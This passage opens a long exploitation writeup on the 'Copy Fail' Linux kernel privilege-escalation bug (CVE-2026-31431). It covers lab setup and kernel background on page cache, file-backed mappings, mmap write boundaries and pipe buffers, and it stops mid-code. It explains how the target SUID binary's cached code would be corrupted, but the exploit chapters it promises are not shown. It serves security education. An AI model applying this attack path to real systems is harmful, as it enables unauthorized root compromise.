0 TLDR
The name "Copy Fail" is almost ironic. The "copy" is not a normal copy into a private buffer; it is zero-copy splice() carrying a file-backed page reference into the crypto scatterlist path. The "fail" fails as a safety boundary: the AEAD decrypt may return an authentication error, but only after authencesn() has already corrupted the page cache.
This post is the full kill chain: page cache, pipes, splice(), AF_ALG, AEAD request construction, scatterlist walking, the authencesn() scratch write, and finally the PoC path from a 4-byte primitive to code execution. It is long by design. If you follow it end to end, Copy Fail stops being a mysterious one-liner exploit and becomes a clean kernel data-flow bug.
The writeup closes with multi-language exploit implementations tailored for different runtime environments in Chapter 7, for readers who want to jump straight to the final exploits.
1 Preface
1.1 Copy Fail Overview
"Copy Fail" is the name given to CVE-2026-31431, a Linux kernel vulnerability that allows a low-privilege user to escalate to root by overwriting protected page-cache memory that backs read-only files.
The vulnerability exists in the interaction between:
- the Linux kernel crypto subsystem (AF_ALG),
- Linux zero-copy pipe mechanisms (splice()),
- and page-cache buffer handling.
In the vulnerable scenario, the kernel mistakenly allows attacker-controlled data to be written into file-backed cached pages that should never become writable through unprivileged operations.
The conceptual attack flow looks like this:
userspace kernel
════════════════════════════════════════════════════
normal process
│
│ socket(AF_ALG) + splice()
│
▼
┌─────────────────┐ ┌──────────────────────┐
│ vulnerable copy │───────────▶│ page cache corruption│
└─────────────────┘ unintended │ (readonly file page) │
write └──────────┬───────────┘
│
│ cached executable
┌────────────────────┐ │ code page modified
│ target SUID binary │ ◀──────────────────┘
└────────┬───────────┘
│
│ executes modified code
│
▼
root
The high-level picture is clean and easy to understand. Historically, many Linux kernel privilege escalations relied on fragile timing windows, TOCTOU bugs, or memory races, with Dirty COW being the classic example. Copy Fail, by contrast, behaves deterministically: the page-cache corruption is driven by kernel data flow rather than by winning a race.
1.2 Page Cache Corruption
Unlike traditional file corruption vulnerabilities, Copy Fail does not directly modify the file stored on disk. Instead, it corrupts the in-memory page-cache representation of the file maintained by the Linux kernel.
If we are familiar with how Linux maps userspace memory onto kernel-managed pages, the concept is trivial to understand:
disk kernel
════════════════════════════════════════════════════
[VICTIM]
┌──────────────┐ mapped into physical memory
│ /usr/bin/su │──────────────────────────┐
└──────────────┘ │
any SUID binary │
original bytes │
│
▼
[TARGET] ┌────────────────────┐
cached .text page │ page cache page │
executable in RAM └──────────┬─────────┘
│
│ Copy Fail
│ corrupts here
[TRIGGER] SUID process maps ▼
┌─────────────┐ corrupted code ┌─────────────────┐
│ User calls │─────────────────▶│ corrupted .text │
│ /usr/bin/su │ │ page in cache │
└──────┬──────┘ └────────┬────────┘
│ │
▼ shell code │
executed as root ◀───────────────────────┘
After the page-cache corruption, the victim binary, such as a SUID executable owned by root, can still appear untouched on disk, but the executable bytes consumed by the kernel may already be modified in memory.
That breaks a critical kernel security invariant:
Read-only cached file pages must never become writable by unprivileged users.
1.3 References
These resources give an initial overview of the vulnerability and of kernel exploitation, and are referenced throughout this writeup:
- Linux kernel programming: GitHub - PacktPublishing/Linux-Kernel-Programming
- Linux network programming: GitHub - nguyenchiemminhvu/LinuxNetworkProgramming
- Copy Fail official page: Copy Fail — CVE-2026-31431
- Copy Fail official writeup: Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. - Xint
2 Environment Setup
2.1 Lab Baseline
2.1.1 Ubuntu Image Installation
The lab uses Ubuntu 24.04.1 Desktop: ubuntu-24.04.1-desktop-amd64.iso
During installation, I recommend temporarily disconnecting the VM from the Internet. This prevents the installer from pulling newer packages or silently moving the kernel away from the target version.
Before installing any tooling, freeze the lab immediately so the kernel does not drift after a reboot, background timer, or automatic package refresh:
# Disable unattended upgrades
sudo systemctl disable --now unattended-upgrades.service
sudo systemctl mask unattended-upgrades.service
# Disable APT periodic timers
sudo systemctl disable --now apt-daily.timer apt-daily-upgrade.timer
sudo systemctl mask apt-daily.timer apt-daily-upgrade.timer
# Disable APT periodic services
sudo systemctl disable --now apt-daily.service apt-daily-upgrade.service
sudo systemctl mask apt-daily.service apt-daily-upgrade.service
# Disable APT periodic upgrade policy
sudo tee /etc/apt/apt.conf.d/99-no-auto-upgrades >/dev/null <<'EOF'
APT::Periodic::Update-Package-Lists "0";
APT::Periodic::Download-Upgradeable-Packages "0";
APT::Periodic::AutocleanInterval "0";
APT::Periodic::Unattended-Upgrade "0";
EOF
# Hold the current kernel packages
sudo apt-mark hold \
linux-generic \
linux-image-generic \
linux-headers-generic \
linux-modules-extra-$(uname -r) \
linux-image-$(uname -r) \
linux-headers-$(uname -r)
Verify that the automatic upgrade path is disabled:
systemctl list-unit-files | grep -E 'apt-daily|unattended'
apt-config dump | grep -E 'APT::Periodic'
Confirm the kernel baseline before moving on. In this lab, the target kernel is 6.8.0:
axura@pwnlab:~$ uname -a
Linux pwnlab 6.8.0-41-generic #41-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 2 20:41:06 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
2.1.2 Tooling Installation
After the frozen baseline snapshot is created, reconnect the network and install the lab tooling.
Do not run any full-system upgrade commands in the lab, such as:
sudo apt upgrade
sudo apt full-upgrade
sudo do-release-upgrade
Install the core build, tracing, debugging, and reversing tools:
sudo apt update && sudo apt install -y \
build-essential make cmake nasm \
gcc-multilib gdb gdb-multiarch \
git vim curl tmux gawk ripgrep htop jq silversearcher-ag tree unzip bison flex bc ssh \
strace ltrace vmtouch \
python3 python3-pip python3-venv python3-dev \
pkg-config \
libssl-dev libelf-dev libcapstone-dev libncurses-dev \
qemu-system-x86 qemu-utils qemu-kvm \
linux-tools-common linux-tools-generic linux-tools-$(uname -r) \
bpftrace trace-cmd
Install Python exploitation tooling:
pip3 install --break-system-packages \
pwntools \
ropper \
capstone \
unicorn \
keystone-engine \
z3-solver
2.2 Kernel Symbols and Source Mapping
For kernel tracing, source lookup, and structure inspection, install the source and debugging helpers:
sudo apt install -y \
python3-drgn \
crash \
dwarves \
systemtap \
linux-headers-$(uname -r) \
linux-source
Under /usr/src, the layout should look similar to this:
axura@pwnlab:~$ ls /usr/src/ -l
total 16
drwxr-xr-x 26 root root 4096 May 12 2026 linux-headers-6.8.0-41
drwxr-xr-x 7 root root 4096 May 12 2026 linux-headers-6.8.0-41-generic
drwxr-xr-x 2 root root 4096 May 12 16:10 linux-source-6.8.0
lrwxrwxrwx 1 root root 45 Apr 12 04:54 linux-source-6.8.0.tar.bz2 -> linux-source-6.8.0/linux-source-6.8.0.tar.bz2
drwxr-xr-x 4 root root 4096 May 12 16:03 python3.12
Extract the kernel source into the workspace:
mkdir -p ~/source
cd ~/source
sudo tar -xf /usr/src/linux-source-*.tar.bz2
We should now see the kernel source tree like:
axura@pwnlab:~/source$ tree linux-source-6.8.0/ -L 1
linux-source-6.8.0/
├── arch
├── block
├── certs
├── COPYING
├── CREDITS
├── crypto
├── Documentation
├── drivers
├── dropped.txt
├── fs
├── generic.depmod.log
├── generic.inclusion-list.log
├── include
├── init
├── io_uring
├── ipc
├── Kbuild
├── Kconfig
├── kernel
├── lib
├── LICENSES
├── MAINTAINERS
├── Makefile
├── mm
├── net
├── README
├── rust
├── samples
├── scripts
├── security
├── sound
├── tools
├── ubuntu
├── Ubuntu.md
├── usr
└── virt
26 directories, 11 files
3 Kernel Prerequisites
This chapter does not try to teach the Linux kernel from scratch. It only builds the pieces needed to follow the Copy Fail path. Section 1.3 lists background material for deeper study, in particular the book Linux Kernel Programming, which explains how the kernel works under the hood.
3.1 File-backed Execution and Page Cache
3.1.1 File-backed Executable Mappings
A Linux process does not see raw physical RAM directly. Instead, it runs inside its own virtual address space (VAS), which is divided into several mappings. A mapping is just a virtual memory region with:
- a backing source
- and a set of permissions
This is basic Linux internals, and Linux Kernel Programming includes a well-crafted diagram of the process VAS. The relevant part for us here is that the executable text region and shared libraries appear as mappings inside the process address space.

Some mappings are anonymous, meaning they are not backed by any file, such as heap growth or freshly allocated memory. Others are file-backed, meaning their contents come from a file mapped into memory. Executable code is usually reached through file-backed mappings: the program's .text region and shared libraries (e.g., libc.so.6) are mapped into the process VAS rather than copied byte-for-byte into a private buffer.
To understand Copy Fail, we need a deeper dive beyond the generic VAS view. A file-backed executable mapping is not "just memory"; it is a userspace virtual range that the kernel ties back to a file object.
userspace kernel
═════════════════════════════════════════════════════════════════
virtual address 0x5... inside .text
│
│ process executes from mapped ELF region
▼
┌─────────────────────────────┐
│ VMA / userspace mapping │
│ r-x file-backed region │ e.g.
│ e.g. /usr/bin/su .text │ 555555554000-555555556000 r--p /usr/bin/su
└──────────────┬──────────────┘ 555555556000-55555557a000 r-xp /usr/bin/su
│
│ page-table lookup
│ virtual → physical translation
│
└────────────────────────────────┐
▼
┌─────────────────────────────┐
│ page-table entries │
0x5555... → phys 0x1ab000 │ virtual → physical mapping │
└──────────────┬──────────────┘
│
│ points to
▼
┌─────────────────────────────┐
│ struct page │
e.g. PFN 0x1ab │ physical page frame │
└──────────────┬──────────────┘
│
│ represents cached bytes from
▼
┌─────────────────────────────┐
│ page cache page │
e.g. file offset 0x2000 │ /usr/bin/su + 0x2000 │
└──────────────┬──────────────┘
│
│ tracked by
▼
┌─────────────────────────────┐
│ inode(/usr/bin/su) │
│ address_space cache tree │
└──────────────┬──────────────┘
│
│ originally loaded from
▼
┌─────────────────────────────┐
│ file on disk │
│ /usr/bin/su │
└─────────────────────────────┘
The exact page-fault-handling details can wait until Section 3.1.3. For now, the important idea is narrower: a file-backed executable mapping still points back to a real file and file offset, rather than to an anonymous private buffer.
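The file-backed nature of executable mappings can be observed from userspace. The following is a minimal sketch, assuming a Linux system with /proc mounted; the helper name file_backed_exec_mappings is made up for illustration. It lists the executable VMAs of the current process that carry a pathname and a file offset.

```python
def file_backed_exec_mappings(pid="self"):
    """Return (start, end, perms, file_offset, path) for executable,
    file-backed VMAs listed in /proc/<pid>/maps."""
    result = []
    with open(f"/proc/{pid}/maps") as maps:
        for line in maps:
            fields = line.split(maxsplit=5)
            if len(fields) < 6:
                continue  # no pathname column: anonymous mapping
            addr, perms, offset, _dev, _inode, path = fields
            path = path.strip()
            # Skip pseudo-mappings such as [vdso] or [stack]
            if "x" in perms and path.startswith("/"):
                start, end = (int(part, 16) for part in addr.split("-"))
                result.append((start, end, perms, int(offset, 16), path))
    return result


for start, end, perms, offset, path in file_backed_exec_mappings():
    print(f"{start:#x}-{end:#x} {perms} file+{offset:#x} {path}")
```

Each printed line pairs a virtual range with a file and an offset into it, which is the userspace-visible half of the chain drawn in the diagram above.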
3.1.2 ELF Loading Through Execve
When a program is launched, the kernel handles it through execve(). For a normal ELF binary, the kernel parses the ELF metadata and creates a new process image whose mappings correspond to the ELF's loadable segments.
From the kernel's perspective:
userspace kernel
════════════════════════════════════════════════════════
process calls syscall
execve("/usr/bin/su")
│ context switch -> kernel mode
└────────────────────────────────┐
│
▼
┌─────────────────────────┐
│ handle execve syscall │
└────────────┬────────────┘
│
▼
┌─────────────────────────┐
│ readfile /usr/bin/su │
│ parse ELF headers │
│ inspect PT_LOAD entries │
└────────────┬────────────┘
│
▼
┌─────────────────────────┐
│ create userspace VMAs │
│ backed by /usr/bin/su │
│ │
│ .text → r-x │
│ .rodata → r-- │
│ .data → rw- │
└────────────┬────────────┘
│
▼
┌─────────────────────────┐
│ [!] connect VMAs to │
│ page-cache pages │
└────────────┬────────────┘
│
│ returns to user mode
┌────────────────────────────────┘
│
▼
process begins execution
at ELF entry point using mapped .text pages
The code-level evidence is in the ELF loader. During load_elf_binary(), the kernel maps each PT_LOAD segment through elf_map(), and elf_map() ultimately calls vm_mmap(filep, ...) on the executable file:
static unsigned long elf_map(struct file *filep, unsigned long addr,
const struct elf_phdr *eppnt, int prot, int type,
unsigned long total_size)
{
...
map_addr = vm_mmap(filep, addr, size, prot, type, off);
...
}
So for an executable like /usr/bin/su, execve() does not first construct a private in-memory image of .text. It creates VMAs whose backing file is still /usr/bin/su; later execution faults resolve against that file-backed mapping.
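To make the PT_LOAD entries concrete, here is a small sketch that reads them from userspace. It assumes a little-endian ELF64 file and uses the running Python interpreter as the sample binary; the helper name pt_load_segments is hypothetical and this is not how the kernel loader is implemented, only a view of the same program headers it inspects.

```python
import os
import struct
import sys

PT_LOAD = 1
PF_X, PF_W, PF_R = 1, 2, 4


def pt_load_segments(path):
    """Return (perms, file_offset, vaddr, filesz) for each PT_LOAD entry
    of a little-endian ELF64 file."""
    with open(path, "rb") as f:
        ehdr = f.read(64)
        if len(ehdr) < 64 or ehdr[:4] != b"\x7fELF" or ehdr[4] != 2 or ehdr[5] != 1:
            raise ValueError("not a little-endian ELF64 file")
        (e_phoff,) = struct.unpack_from("<Q", ehdr, 0x20)
        e_phentsize, e_phnum = struct.unpack_from("<HH", ehdr, 0x36)
        segments = []
        for i in range(e_phnum):
            f.seek(e_phoff + i * e_phentsize)
            (p_type, p_flags, p_offset, p_vaddr,
             _paddr, p_filesz, _memsz, _align) = struct.unpack("<IIQQQQQQ", f.read(56))
            if p_type != PT_LOAD:
                continue
            perms = "".join(ch if p_flags & bit else "-"
                            for ch, bit in (("r", PF_R), ("w", PF_W), ("x", PF_X)))
            segments.append((perms, p_offset, p_vaddr, p_filesz))
    return segments


try:
    sample = os.path.realpath(sys.executable)
    for perms, off, vaddr, size in pt_load_segments(sample):
        print(f"{perms} file+{off:#x} -> vaddr {vaddr:#x} ({size:#x} bytes)")
except (OSError, ValueError) as exc:
    print(f"skipping demo: {exc}")
```

Each row corresponds to one file-backed mapping request: a range of the file, a target virtual address, and the protection bits for the resulting VMA.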
For Copy Fail, the important segment is .text: the machine code that the CPU will actually execute. Under normal conditions, this region is mapped read-only and executable.
axura@pwnlab:~$ objdump -h /usr/bin/su | head -n5 \
&& objdump -h /usr/bin/su | grep text -A1
/usr/bin/su: file format elf64-x86-64
Sections:
Idx Name Size VMA LMA File off Algn
15 .text 00005d02 0000000000003f80 0000000000003f80 00003f80 2**4
CONTENTS, ALLOC, LOAD, READONLY, CODE
Those READONLY and CODE properties are the core security descriptors. At runtime, the corresponding /usr/bin/su executable mapping appears as r-xp:
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
Start End Perm Size Offset File (set vmmap-prefer-relpaths on)
0x555f8bd7e000 0x555f8bd81000 r--p 3000 0 /usr/bin/su
0x555f8bd81000 0x555f8bd88000 r-xp 7000 3000 /usr/bin/su
0x555f8bd88000 0x555f8bd8a000 r--p 2000 a000 /usr/bin/su
0x555f8bd8a000 0x555f8bd8b000 r--p 1000 c000 /usr/bin/su
0x555f8bd8b000 0x555f8bd8c000 rw-p 1000 d000 /usr/bin/su
...
Here, p indicates a private mapping: modifications are handled privately through copy-on-write rather than being written back as they would be for a shared writable file mapping. The pathname /usr/bin/su shows that this VMA is backed by an executable file on disk.
This is the part that can feel counterintuitive to a userspace pwner: the r-xp permission only describes the userspace VMA. It does not mean the underlying file-backed cache page is impossible to corrupt through a kernel bug.
If an attacker can modify those backing bytes, the mapping may still look read-only from userspace, while the instructions fetched from the page cache have already changed.
Once that boundary is broken, the most dangerous target class is obvious: root-owned SUID binaries such as /usr/bin/su. If we can hijack the page-cache-backed .text bytes of an SUID executable, the next execution may fetch attacker-controlled instructions from cache while the process runs with elevated privileges.
So the real question becomes:
Can an unprivileged user corrupt page-cache-backed executable bytes for a read-only file?
3.1.3 Linux Page Cache
The page cache is the kernel's in-memory cache for file-backed data. When a process reads, maps, or executes a file, Linux can serve the bytes from cached pages in RAM instead of fetching them from disk every time.
For Copy Fail, the page cache is the critical target:
file on disk
│
│ read / mmap / execve
▼
page-cache page
│
│ mapped into process as file-backed memory
▼
userspace VMA
3.1.3.1 Runtime Cache Inspection
Linux exposes system-wide file-cache accounting through /proc/meminfo:
axura@pwnlab:~$ grep -E 'Cached|Buffers|Active\\(file\\)|Inactive\\(file\\)' /proc/meminfo
Buffers: 42512 kB
Cached: 1090328 kB
SwapCached: 0 kB
axura@pwnlab:~$ free -h
total used free shared buff/cache available
Mem: 7.7Gi 1.3Gi 5.6Gi 44Mi 1.1Gi 6.4Gi
Swap: 3.8Gi 0B 3.8Gi
In this lab, both commands reported about 1.1 GiB in cache usage, confirming that the kernel is already holding a substantial amount of file-backed data in memory.
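The same accounting can be read programmatically. This is a minimal sketch, assuming a Linux /proc/meminfo in the usual "Key: value kB" layout; read_meminfo is an illustrative helper name, and the numbers it prints will differ from the lab values above.

```python
def read_meminfo(path="/proc/meminfo"):
    """Parse /proc/meminfo into {key: integer value}. Most values are in kB."""
    info = {}
    with open(path) as f:
        for line in f:
            key, _, rest = line.partition(":")
            parts = rest.split()
            if parts:
                info[key.strip()] = int(parts[0])
    return info


meminfo = read_meminfo()
for key in ("Buffers", "Cached", "Active(file)", "Inactive(file)"):
    value = meminfo.get(key)
    if value is not None:
        print(f"{key:>15}: {value / 1024:.1f} MiB")
```

These are system-wide counters, so they confirm that file data is being cached but say nothing yet about any particular file.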
We can then narrow that view to a single file:
axura@pwnlab:~$ vmtouch -v /usr/bin/su
/usr/bin/su
[OOOOOOOOOOOOOO] 14/14
Files: 1
Directories: 0
Resident Pages: 14/14 56K/56K 100%
Elapsed: 6.4e-05 seconds
This shows that /usr/bin/su currently has resident file-backed pages in page cache. However, it does not yet prove how executable .text mappings reach those pages.
3.1.3.2 Page-cache Object Model
To reason about page-cache corruption, we need the kernel object model. On Linux, executable mappings are ultimately backed by regular files on disk. At the filesystem layer, each regular file is represented by an inode, which owns the file's page-cache mapping:
axura@pwnlab:~$ stat /usr/bin/su
File: /usr/bin/su
Size: 55680 Blocks: 112 IO Block: 4096 regular file
Device: 8,2 Inode: 2383706 Links: 1
Access: (4755/-rwsr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2026-05-13 12:32:47.267708839 +0800
Modify: 2026-03-07 00:00:54.000000000 +0800
Change: 2026-05-13 11:44:17.032955828 +0800
Birth: 2026-05-13 11:44:16.979947665 +0800
For page-cache purposes, the important members of struct inode are i_mapping and the embedded i_data:
struct inode {
...
struct address_space *i_mapping; // pointer to page-cache mapping for this file
...
struct address_space i_data; // stores metadata about the file's cached pages
...
};
So each inode links to the file's page cache, represented by a per-file struct address_space:
struct address_space {
struct inode *host;
struct xarray i_pages;
...
struct rb_root_cached i_mmap;
...
};
The fields that matter here are:
- host: which file this cache belongs to
- i_pages: the xarray that stores cached file folios/pages by file offset
- i_mmap: the set of user VMAs mapping this file's cached contents
For /usr/bin/su, the corresponding inode owns an address_space object; that address_space stores cached file data in i_pages and tracks user mappings in i_mmap.
Conceptually:
file on disk: /usr/bin/su
│
▼
┌───────────────┐
│ inode │
└───────┬───────┘
│ owns
▼
┌─────────────────────────────┐
│ address_space │
│ │
│ host -> this inode │
│ i_pages -> cached folios │────▶ cached executable page, e.g. file offset 0x2000
│ i_mmap -> mapped VMAs │────▶ VMA in proc A: /usr/bin/su r-xp
└─────────────────────────────┘ VMA in proc B: /usr/bin/su r-xp
VMA in proc C: /usr/bin/su r-xp
...
The same address_space object, that is, the file's page cache, can then be reused by future processes mapping the same file.
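The address_space itself is not visible from userspace, but the inode identity it hangs off is. The sketch below, which uses a temporary file rather than /usr/bin/su, opens the same path twice and compares the (st_dev, st_ino) pair. It only illustrates that independent opens resolve to one inode, which is the object the per-file cache belongs to.

```python
import os
import tempfile

with tempfile.NamedTemporaryFile() as f:
    f.write(b"cached bytes")
    f.flush()
    # Two independent opens, as two unrelated processes might perform
    fd_a = os.open(f.name, os.O_RDONLY)
    fd_b = os.open(f.name, os.O_RDONLY)
    try:
        st_a, st_b = os.fstat(fd_a), os.fstat(fd_b)
        same_inode = (st_a.st_dev, st_a.st_ino) == (st_b.st_dev, st_b.st_ino)
    finally:
        os.close(fd_a)
        os.close(fd_b)

print("same inode behind both descriptors:", same_inode)
```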
3.1.3.3 Executable Fault Path
The missing link from 3.1.3.1 is the page-fault path: when an executable mapping (.text) needs bytes from /usr/bin/su, where does the kernel fetch them from?
For file-backed VMAs, the generic page fault handler is filemap_fault(). Its opening declarations expose the chain directly:
vm_fault_t filemap_fault(struct vm_fault *vmf)
{
// file mapped by the faulting VMA
struct file *file = vmf->vma->vm_file;
// page-cache mapping associated with the file
struct address_space *mapping = file->f_mapping;
// inode owning this page-cache mapping
struct inode *inode = mapping->host;
// page-cache index for the faulting offset
pgoff_t index = vmf->pgoff;
...
/*
* Do we have something in the page cache already?
*/
folio = filemap_get_folio(mapping, index);
// Try to find the cached folio/page for this file offset
...
}
This shows that executable bytes are resolved through the file's page-cache mapping. This is the core idea of Copy Fail: if that cached page has been corrupted, every read-only VMA that maps it is corrupted at the source.
3.1.3.4 Cache Lookup
As the flow of filemap_fault() shows, when a process faults on a file-backed executable VMA, the kernel starts from vmf->vma->vm_file, follows file->f_mapping, and then looks up the corresponding cached folio/page in the file's page-cache mapping.
The final lookup operation is done by filemap_get_folio(mapping, index), which reaches __filemap_get_folio():
struct folio *__filemap_get_folio(struct address_space *mapping, pgoff_t index,
fgf_t fgp_flags, gfp_t gfp)
{
struct folio *folio;
repeat:
// lookup cached folio/page by file offset
folio = filemap_get_entry(mapping, index);
...
if (!folio)
goto no_page;
...
return folio;
no_page:
// on a cache miss, allocate and insert a new folio
// if the caller requested creation
if (!folio && (fgp_flags & FGP_CREAT)) {
...
folio = filemap_alloc_folio(alloc_gfp, order);
...
err = filemap_add_folio(mapping, folio, index, gfp);
...
}
return folio;
}
That gives the cache behavior:
- cache hit → reuse existing folio for this file offset
- cache miss → allocate folio → insert into file mapping → later accesses may reuse it
This is why page-cache corruption is powerful. Once a file-backed folio is modified in memory, later reads, mappings, or executions of the same file offset may observe the modified cached bytes until the cache is invalidated or reloaded.
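The hit/miss behavior can be mimicked with a toy model. Everything below is a simplification for illustration: ToyAddressSpace, its get_folio method, and the disk_reads counter are invented names, a dict stands in for the xarray, and a bytes object stands in for the disk.

```python
from dataclasses import dataclass, field

PAGE_SIZE = 4096


@dataclass
class ToyAddressSpace:
    host: str                                     # stands in for the owning inode
    backing: bytes                                # stands in for the on-disk file
    i_pages: dict = field(default_factory=dict)   # index -> cached folio
    disk_reads: int = 0

    def get_folio(self, index, create=True):
        folio = self.i_pages.get(index)
        if folio is not None:
            return folio                          # cache hit: reuse existing folio
        if not create:
            return None
        # Cache miss: allocate a folio, fill it from "disk", insert it
        self.disk_reads += 1
        start = index * PAGE_SIZE
        folio = bytearray(self.backing[start:start + PAGE_SIZE])
        self.i_pages[index] = folio
        return folio


mapping = ToyAddressSpace(host="/usr/bin/su", backing=bytes(range(256)) * 32)
first = mapping.get_folio(1)       # miss, loads from backing
second = mapping.get_folio(1)      # hit, same object
first[0:4] = b"XXXX"               # in-memory modification of the cached folio
print(first is second, mapping.disk_reads)
print(bytes(mapping.get_folio(1)[:4]), mapping.backing[4096:4100])
```

In the toy, later lookups return the modified folio while the backing bytes stay untouched, which mirrors the split between cached state and on-disk state described above.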
3.1.3.5 Buffered Read Path
The same cache object is also used by ordinary buffered file reads. generic_file_read_iter() dispatches into filemap_read(), whose comment states the model directly:
/**
* filemap_read - Read data from the page cache.
* @iocb: The iocb to read.
* @iter: Destination for the data.
* @already_read: Number of bytes already read by the caller.
*
* Copies data from the page cache. If the data is not currently present,
* uses the readahead and read_folio address_space operations to fetch it.
*
* ...
*/
ssize_t filemap_read(struct kiocb *iocb, struct iov_iter *iter,
ssize_t already_read) { ... }
3.1.3.6 Page-cache Takeaway
Execution faults and buffered reads both converge on the same model: the page cache is the shared, kernel-resident copy of file data consulted by file-backed mappings and ordinary file reads.
system boot
══════════════════════════════════════════════════════
initialize memory manager
initialize page allocator
initialize page-cache infrastructure
│
│ no file pages cached yet
▼
page cache starts empty
runtime
══════════════════════════════════════════════════════
process executes, reads, or maps /usr/bin/su
│
│ execve() / read() / mmap()
▼
kernel requests file-backed data
│
│ load from disk on cache miss
▼
┌──────────────────────────────┐
│ page cache │
│ cached /usr/bin/su pages │
│ executable file data in RAM │
└──────────────┬───────────────┘
│
│ reused by later access
▼
proc A → /usr/bin/su
proc B → /usr/bin/su
proc C → /usr/bin/su
So if we manage to corrupt the cached page for a file offset, later consumers of that same file-backed data may observe the corrupted bytes even when the read-only on-disk file remains unchanged. That is the page-cache side of Copy Fail.
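The sharing property can be seen with a fully legitimate write. In this sketch, which assumes a Unix system and uses a temporary file the script owns, one descriptor writes through the normal write path while a separate read-only shared mapping and a pread() observe the result. No boundary is crossed here; the point is only that mappings and buffered reads consult the same cached copy.

```python
import mmap
import os
import tempfile

with tempfile.NamedTemporaryFile() as f:
    f.write(b"A" * mmap.PAGESIZE)
    f.flush()

    ro_fd = os.open(f.name, os.O_RDONLY)
    # Read-only shared mapping: a consumer of the file's cached page
    view = mmap.mmap(ro_fd, mmap.PAGESIZE, flags=mmap.MAP_SHARED, prot=mmap.PROT_READ)
    try:
        before = view[:4]
        # Legitimate write through a descriptor that has write authority
        os.pwrite(f.fileno(), b"BBBB", 0)
        after_map = view[:4]                 # seen through the mapping
        after_read = os.pread(ro_fd, 4, 0)   # seen through a buffered read
    finally:
        view.close()
        os.close(ro_fd)

print(before, after_map, after_read)
```

Copy Fail matters because it produces the same kind of visible change without ever holding the write authority used in this example.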
3.1.4 Page-cache Write Boundary
Userspace can read file-backed pages, execute them, and even create private writable copies through MAP_PRIVATE mappings (the p in r-xp). The security boundary is narrower:
An unprivileged path must not mutate the shared page-cache page behind a file unless it has legitimate write authority over that file-backed state.
This distinction matters because executable file pages are often shared kernel-resident state:
- a private write must create an anonymous copy
- a shared write must require write permission to the file
Direct mutation of a cached executable page through an unrelated kernel path violates that boundary.
The mmap() path encodes this boundary before a file-backed VMA is created. In do_mmap(), a writable shared mapping is rejected unless the file was opened writable:
case MAP_SHARED:
case MAP_SHARED_VALIDATE:
// shared writable mmap requires writable file descriptor
if (prot & PROT_WRITE) {
if (!(file->f_mode & FMODE_WRITE))
return -EACCES;
...
}
...
// remove VMA write/share capability if fd is read-only
if (!(file->f_mode & FMODE_WRITE))
vm_flags &= ~(VM_MAYWRITE | VM_SHARED);
The VMA permission bits are defined in include/linux/mm.h:
- VM_WRITE means the mapping is currently writable.
- VM_MAYWRITE means the mapping may later become writable through mprotect().
The page-fault path preserves the same boundary. sanitize_fault_flags() rejects write faults on mappings that lack VM_MAYWRITE as invalid and raises SIGSEGV. For private writable mappings, do_wp_page() resolves the write fault through wp_page_copy(), creating a private anonymous copy instead of modifying the shared file-backed page.
The normal model is:
| Mapping / Operation | Behavior |
|---|---|
| Read/execute file-backed page | Allowed, backed directly by page cache |
| Private writable mapping (MAP_PRIVATE) | Allowed through Copy-on-Write (COW) |
| Shared writable mapping (MAP_SHARED) | Requires FMODE_WRITE |
| Write into read-only page cache | Forbidden |
The normal boundary is visible from userspace. A shared writable mapping (MAP_SHARED | PROT_WRITE) of /usr/bin/su through a read-only file descriptor is denied as expected:
axura@pwnlab:~$ sudo python3 - <<'PY'
import mmap, os
fd = os.open("/usr/bin/su", os.O_RDONLY)
try:
    mmap.mmap(fd, 4096, prot=mmap.PROT_READ | mmap.PROT_WRITE, flags=mmap.MAP_SHARED)
    print("unexpected: shared writable mapping succeeded")
except OSError as e:
    print(f"MAP_SHARED|PROT_WRITE failed as expected: {e}")
finally:
    os.close(fd)
PY
MAP_SHARED|PROT_WRITE failed as expected: [Errno 13] Permission denied
The same file can still be mapped privately with write permission. In that case, the write is process-local: it updates the private mapping and leaves the file-backed page-cache contents unchanged.
axura@pwnlab:~$ python3 - <<'PY'
import mmap, os
path = "/usr/bin/su"
fd = os.open(path, os.O_RDONLY)
before = open(path, "rb").read(1)
m = mmap.mmap(fd, 4096, prot=mmap.PROT_READ | mmap.PROT_WRITE, flags=mmap.MAP_PRIVATE)
m[0:1] = b"X"
after_file = open(path, "rb").read(1)
print("private mapping byte:", m[0:1])
print("file byte unchanged:", after_file == before)
m.close()
os.close(fd)
PY
private mapping byte: b'X'
file byte unchanged: True
The two results match the kernel-side invariant:
- MAP_SHARED | PROT_WRITE → denied with EACCES without file write authority
- MAP_PRIVATE | PROT_WRITE → allowed, but writes go to a private COW page: b'X' appears only in the process-local view and the file byte is unchanged
This design is safe and solid for normal writable file mappings. Copy Fail becomes security-critical because it reaches the cached executable page from a different subsystem: the attacker does not need a writable file mapping if the crypto path can be tricked into writing into that shared page directly.
Next we will dive into that subsystem, the kernel crypto path, which can be tricked into writing a tiny piece of page cache. That is why we call it a scratch write primitive.
3.2.1 Pipe Buffer Model
At the userspace API level, a pipe behaves like a byte stream: write() pushes bytes in, and read() pulls bytes out.
The classic model looks like this:
int fd[2];
pipe(fd);
write(fd[1], "hello", 5);
char buf[16];
read(fd[0], buf, 5);
That abstraction is correct for ordinary programming, but it is not the model that matters for Copy Fail. Inside the kernel, a pipe is not one flat byte array. It is a ring of buffer descriptors, and each descriptor points to the memory backing part of the stream.
That distinction matters because splice() can make a pipe carry references to existing pages instead of freshly copied anonymous data.
The kernel pipe object is struct pipe_inode_info. The fields relevant here are head, tail, ring_size, and bufs:
struct pipe_inode_info {
...
unsigned int head;
unsigned int tail;
unsigned int ring_size;
struct pipe_buffer *bufs; // ring of pipe_buffer descriptors
...
};
So the internal shape is:
pipe_inode_info
└── bufs[] ring
├── pipe_buffer
├── pipe_buffer
└── ...
Each slot is a struct pipe_buffer:
struct pipe_buffer {
    struct page *page; // backing page
    unsigned int offset, len; // where the data starts inside that page, and how many bytes are valid
    const struct pipe_buf_operations *ops; // rules for handling this buffer
    unsigned int flags; // buffer state
    unsigned long private; // private data owned by the ops
};
The important point is that a pipe slot does not just mean "here are some bytes." It means: "the current data lives in this page, starting at this offset, for this length, under these buffer-specific rules".
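A toy model may help fix the shape in mind. The classes below are invented for illustration (ToyPipe, ToyPipeBuffer, push, pop) and deliberately ignore ops, flags, locking, and partial reads. They only show a ring of descriptors in which each slot names a page plus a byte range instead of holding the bytes itself.

```python
from dataclasses import dataclass
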